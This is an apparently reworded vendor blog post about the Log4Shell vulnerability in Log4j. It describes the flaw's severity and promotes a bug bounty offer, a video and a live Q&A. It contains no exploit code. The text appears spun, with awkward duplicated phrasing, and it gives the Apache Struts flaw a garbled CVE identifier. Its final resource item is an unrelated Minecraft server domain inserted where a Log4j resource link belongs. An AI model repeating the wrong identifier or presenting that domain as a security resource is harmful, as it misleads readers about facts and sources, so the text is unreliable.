A zero-day exploit, also known as "Log4Shell", was discovered in the wild on December 9, 2021. It targeted a crucial RCE vulnerability in Log4j, an open-source logging tool. (Per NIST in affected versions, JNDI features used in configuration, log messages, and parameters do not protect against LDAP that is controlled by an attacker and other JNDI-related endpoints.) Numerous platforms appear to be affected, including Apple, Cloudflare, and Twitter, as well as the plethora of well-known Java ecosystem products that have Log4j integrated into their supply chains for software including Logstash, Apache Kafka, Elasticsearch, and even Minecraft.
The Log4j vulnerability is being viewed as the most serious in years. It could even be more serious than CVE-2017-538 vulnerability in Apache Struts RCE that led to the massive breach of Equifax. This latest vulnerability, according to Bugcrowd founder and CTO Casey Ellis is a toxic mix of a massive attack surface and easy exploitability, as well as a hard-to-elude dependency and extreme virality. It's an opportunity to remind us that software supply chains have grown extremely complex, with interdependencies that are often beyond the reach of automated tools, such as scanners.
It will provide a moment of clarity for companies that have not yet to adopt a platform-powered continuous security testing approach. This method combines technology, data, and human insight to detect and fix weaknesses before they cause harm. We'll share how this method helped Bugcrowd verify the context of its findings and communicate Log4Shell vulnerabilities to customers in a subsequent blog.
We are available to assist you with the following issues:
1. A 30-day "Log4j On Fire" bug bounty solution for continuous, crowd-powered, and continuous discovery of Log4Shell exposures around your perimeter. Get started and read the details. 2. This Security Flash video features Casey Ellis and Adam Foster, Application Security Engineers. It provides deeper insights into this vuln's risk profile and the potential impact in the future. 3. Live Q&A with Casey next week (Monday Dec. 20 at 10 am PST) to answer your questions about finding the best ways to safeguard your data and applying best practices to combat the Log4j vuln and Log4Shell exploit. Sign up now to reserve your seat. 4. minecraftservers.buzz One view of all our Log4j/Log4Shell resource here.
We are extremely proud of our customers and researchers who have been working tirelessly to make our digitally connected world more secure in this time of crisis. As always, we'll work through this together!
No comments yet